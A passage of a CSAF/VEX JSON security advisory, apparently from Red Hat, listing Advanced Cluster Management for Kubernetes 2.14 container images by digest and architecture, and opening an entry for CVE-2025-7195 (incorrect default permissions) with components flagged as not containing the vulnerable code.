"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5e8b6dcca8daba99087b2ab18c19c9da07d6b8850ca596a3decd8a26a049ea84_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5e8b6dcca8daba99087b2ab18c19c9da07d6b8850ca596a3decd8a26a049ea84_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5e8b6dcca8daba99087b2ab18c19c9da07d6b8850ca596a3decd8a26a049ea84_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:84a20b1a3c8240b9535975d2266a84eab22ddd6bba9c11aa8aaea5bf542b6c05_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:84a20b1a3c8240b9535975d2266a84eab22ddd6bba9c11aa8aaea5bf542b6c05_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:84a20b1a3c8240b9535975d2266a84eab22ddd6bba9c11aa8aaea5bf542b6c05_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:d9aef7d13b8fe266a3cef070df811bc790c0a3430ead2f048664fd2e37a6d76b_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:d9aef7d13b8fe266a3cef070df811bc790c0a3430ead2f048664fd2e37a6d76b_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:d9aef7d13b8fe266a3cef070df811bc790c0a3430ead2f048664fd2e37a6d76b_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:27fd4853b405d8075ae127ab75205f77a08565bdc2746dffc615141e9ff22e06_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:27fd4853b405d8075ae127ab75205f77a08565bdc2746dffc615141e9ff22e06_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:27fd4853b405d8075ae127ab75205f77a08565bdc2746dffc615141e9ff22e06_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:44b5c9b82ab30240cff679ced486e1d0660722992375065e7a997a29807c220f_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:44b5c9b82ab30240cff679ced486e1d0660722992375065e7a997a29807c220f_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:44b5c9b82ab30240cff679ced486e1d0660722992375065e7a997a29807c220f_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:4cb90416465a8de08582fc5c90d73b8c796a8384be8fbd77797a1fdc8d2b5348_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:4cb90416465a8de08582fc5c90d73b8c796a8384be8fbd77797a1fdc8d2b5348_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:4cb90416465a8de08582fc5c90d73b8c796a8384be8fbd77797a1fdc8d2b5348_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:736d1c14872440c8973acbe47b42249958277ce20d743d86a8d65c932ae257e0_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:736d1c14872440c8973acbe47b42249958277ce20d743d86a8d65c932ae257e0_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:736d1c14872440c8973acbe47b42249958277ce20d743d86a8d65c932ae257e0_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:36871ffe49e522c8f838fd804675bca1fb325d94cef2abdc03650b0754fee4e7_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:36871ffe49e522c8f838fd804675bca1fb325d94cef2abdc03650b0754fee4e7_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:36871ffe49e522c8f838fd804675bca1fb325d94cef2abdc03650b0754fee4e7_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bf39aca4041bc20fecc14e0158462f3368755af4cdf92c278ed654d92b0a5ec4_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bf39aca4041bc20fecc14e0158462f3368755af4cdf92c278ed654d92b0a5ec4_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bf39aca4041bc20fecc14e0158462f3368755af4cdf92c278ed654d92b0a5ec4_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:df47c41ea438bd520e45eea9d43cacde61617fae28f5e90ea38d7462ad4e233c_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:df47c41ea438bd520e45eea9d43cacde61617fae28f5e90ea38d7462ad4e233c_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:df47c41ea438bd520e45eea9d43cacde61617fae28f5e90ea38d7462ad4e233c_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:f1b763117e203efefeed33b28135a535732d02bf563ebfb740b31b0a0106d662_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:f1b763117e203efefeed33b28135a535732d02bf563ebfb740b31b0a0106d662_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:f1b763117e203efefeed33b28135a535732d02bf563ebfb740b31b0a0106d662_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:5f7390b5f48371553c718dd00dc51fd646d57994f299b1ac6d80ae3be1d4591f_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:5f7390b5f48371553c718dd00dc51fd646d57994f299b1ac6d80ae3be1d4591f_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:5f7390b5f48371553c718dd00dc51fd646d57994f299b1ac6d80ae3be1d4591f_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:7bad802bf7b204d29cedb35c4a63143b2d32e5d6961514327a1cc14fe16d48ad_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:7bad802bf7b204d29cedb35c4a63143b2d32e5d6961514327a1cc14fe16d48ad_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:7bad802bf7b204d29cedb35c4a63143b2d32e5d6961514327a1cc14fe16d48ad_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a1896f5f7d19945fe045b3f148c1802fa05bf6cb2d029d57a6ad618984f9b213_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a1896f5f7d19945fe045b3f148c1802fa05bf6cb2d029d57a6ad618984f9b213_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a1896f5f7d19945fe045b3f148c1802fa05bf6cb2d029d57a6ad618984f9b213_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:f7bd358a85922350de6f9f4dbf91a473ca51f245f2ddbc941388bc94fb05d33e_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:f7bd358a85922350de6f9f4dbf91a473ca51f245f2ddbc941388bc94fb05d33e_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:f7bd358a85922350de6f9f4dbf91a473ca51f245f2ddbc941388bc94fb05d33e_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:370c2024529902a32cb9e82d3dc793a0e5ac9de8a5345e58674078074f7222a6_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:370c2024529902a32cb9e82d3dc793a0e5ac9de8a5345e58674078074f7222a6_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:370c2024529902a32cb9e82d3dc793a0e5ac9de8a5345e58674078074f7222a6_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:45b898ff7eb7b5a298577ca16829e9554f179a25609e72874a8fde9ef0d892fd_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:45b898ff7eb7b5a298577ca16829e9554f179a25609e72874a8fde9ef0d892fd_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:45b898ff7eb7b5a298577ca16829e9554f179a25609e72874a8fde9ef0d892fd_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:82f99122cfc73a9f43ab1f03ffb819bf8a0eccfa07bfebb145fdb883a36f03de_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:82f99122cfc73a9f43ab1f03ffb819bf8a0eccfa07bfebb145fdb883a36f03de_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:82f99122cfc73a9f43ab1f03ffb819bf8a0eccfa07bfebb145fdb883a36f03de_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bf8857a8967922ece490e8fcde410c3efb21ebaac48a4346011ded390d763170_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bf8857a8967922ece490e8fcde410c3efb21ebaac48a4346011ded390d763170_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bf8857a8967922ece490e8fcde410c3efb21ebaac48a4346011ded390d763170_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:6e91b713e6d6b965b9bb5e5ba5ae37a487fe73fb18b59e7f2b8ee89ebe52f212_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:6e91b713e6d6b965b9bb5e5ba5ae37a487fe73fb18b59e7f2b8ee89ebe52f212_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:6e91b713e6d6b965b9bb5e5ba5ae37a487fe73fb18b59e7f2b8ee89ebe52f212_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:80f8f269b175dfbecc4c21c39b6385e4fc0939a0e5297e580213412f558ac583_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:80f8f269b175dfbecc4c21c39b6385e4fc0939a0e5297e580213412f558ac583_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:80f8f269b175dfbecc4c21c39b6385e4fc0939a0e5297e580213412f558ac583_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b7c83aef590284b867aa6050b5c206a7b81a2a2dfad8477cbc3b143e368c3636_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b7c83aef590284b867aa6050b5c206a7b81a2a2dfad8477cbc3b143e368c3636_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b7c83aef590284b867aa6050b5c206a7b81a2a2dfad8477cbc3b143e368c3636_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:e4d4a45a7bb882f5d60acde0cdd2bb6e092ba50dc709b484a513d1399bef18d4_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:e4d4a45a7bb882f5d60acde0cdd2bb6e092ba50dc709b484a513d1399bef18d4_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:e4d4a45a7bb882f5d60acde0cdd2bb6e092ba50dc709b484a513d1399bef18d4_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:28072f029e61aa7fdfef70a767f5c809775dddaef337d6bfe48ec25f7839a184_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:28072f029e61aa7fdfef70a767f5c809775dddaef337d6bfe48ec25f7839a184_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:28072f029e61aa7fdfef70a767f5c809775dddaef337d6bfe48ec25f7839a184_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:2b5b2a26f35f6ebd7bc921ceecbdb16c55d1e03337c74a9d2e271be4635066ee_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:2b5b2a26f35f6ebd7bc921ceecbdb16c55d1e03337c74a9d2e271be4635066ee_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:2b5b2a26f35f6ebd7bc921ceecbdb16c55d1e03337c74a9d2e271be4635066ee_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:3b667400920c96bb5f69c9a8d0510993c084ba6604d43be233d217c83f6a2e67_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:3b667400920c96bb5f69c9a8d0510993c084ba6604d43be233d217c83f6a2e67_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:3b667400920c96bb5f69c9a8d0510993c084ba6604d43be233d217c83f6a2e67_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:865e35a99ab1efd55b6cec986cc170859baf895306bf86c730f818f51b548b39_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:865e35a99ab1efd55b6cec986cc170859baf895306bf86c730f818f51b548b39_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:865e35a99ab1efd55b6cec986cc170859baf895306bf86c730f818f51b548b39_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:0016866635c4b9a24072275ec416ecc38df049edcea177611a12d1aef4394b43_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:0016866635c4b9a24072275ec416ecc38df049edcea177611a12d1aef4394b43_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:0016866635c4b9a24072275ec416ecc38df049edcea177611a12d1aef4394b43_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e41d647fc468bb3f44bad88b4656b33e557427beb0191b0fcdc5f1f0df66c07b_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e41d647fc468bb3f44bad88b4656b33e557427beb0191b0fcdc5f1f0df66c07b_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e41d647fc468bb3f44bad88b4656b33e557427beb0191b0fcdc5f1f0df66c07b_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e77b6c7a0890213bcdff276d240e9e6ac773f90dc6b4b1626dfc4c70fceb846c_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e77b6c7a0890213bcdff276d240e9e6ac773f90dc6b4b1626dfc4c70fceb846c_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e77b6c7a0890213bcdff276d240e9e6ac773f90dc6b4b1626dfc4c70fceb846c_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e9821e27e4187c6fafec0bc3cfb5f5e534faa5c5afdd82cad9869d54d9dcf855_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e9821e27e4187c6fafec0bc3cfb5f5e534faa5c5afdd82cad9869d54d9dcf855_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e9821e27e4187c6fafec0bc3cfb5f5e534faa5c5afdd82cad9869d54d9dcf855_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:231f3779db0ac8489f4d0333b176b2dff83eda3778573e1f990eafcf18317bd6_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:231f3779db0ac8489f4d0333b176b2dff83eda3778573e1f990eafcf18317bd6_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:231f3779db0ac8489f4d0333b176b2dff83eda3778573e1f990eafcf18317bd6_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:99faf43dc00f23f4cb981423d25b66848ddae927912f99078cc567afeb2a7191_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:99faf43dc00f23f4cb981423d25b66848ddae927912f99078cc567afeb2a7191_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:99faf43dc00f23f4cb981423d25b66848ddae927912f99078cc567afeb2a7191_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:abe767acb1f0f6cc625fbe63a6a4c00b0eef58642ec55d2e107bf0f90f9e1274_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:abe767acb1f0f6cc625fbe63a6a4c00b0eef58642ec55d2e107bf0f90f9e1274_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:abe767acb1f0f6cc625fbe63a6a4c00b0eef58642ec55d2e107bf0f90f9e1274_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:f70d80b998b2b03c91f59b77a315e82737c304ffe174f5d1839dd28c2ec01bed_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:f70d80b998b2b03c91f59b77a315e82737c304ffe174f5d1839dd28c2ec01bed_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:f70d80b998b2b03c91f59b77a315e82737c304ffe174f5d1839dd28c2ec01bed_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
}
]
},
"vulnerabilities": [
{
"acknowledgments": [
{
"names": [
"Antony Di Scala",
"Michael Whale",
"James Force"
]
}
],
"cve": "CVE-2025-7195",
"cwe": {
"id": "CWE-276",
"name": "Incorrect Default Permissions"
},
"discovery_date": "2025-07-04T08:54:01.878000+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7093e9c5c223922accfd344ad2bba34c763eab82b35669cf175a3333b2b4e445_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b646fa5444f28c01365df32d019e0f57872b450597ae2bb6993e86014d1a7548_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b7bfd21a3a383f631488e0cc979ea9969dc3cd6f2db10960f524e37b058dfd5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:f8b6b891e5a948fc03983b2f40bee3eb312e5bef80b2a35fc502d28ed96e1c93_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:05847c2e995e681bdcc3f809e76f512767f40ac4498c14fad4afb4cae83f33d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:4f03df7f0ee87ce88f225e193f03e6471e26808e8a5224bd75828740cf5e42b4_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:844cb73f99650653f57b64fa478ae4d0b207cd60040cdbd743bca7fd76af30ea_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:8f220b523bebe0d150987f34090005f500af558f0659808d4bee974fbb48dd42_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:1399e0cd77802ef77f4ca5c80e2173516420755581c886949cc5f5bd7473f38b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:4e0e3c4f0fc0cc13d9780487ccf9a1315ff0e867c003cb5a9c919d2b20bd3e58_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:7f45bf6cfb2eefd9107b76524fd83883f389eda8f69f1f2ee55b56542283d9b4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:911c05cb845692bb81e2749b73fd9fd6826771cb4b5ac6ad119a8f3fcfb650ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6b34944da4fcf630306c6bef503b659b7ed578faf0f5b5e3c0bf2938b1f18247_ppc64le",
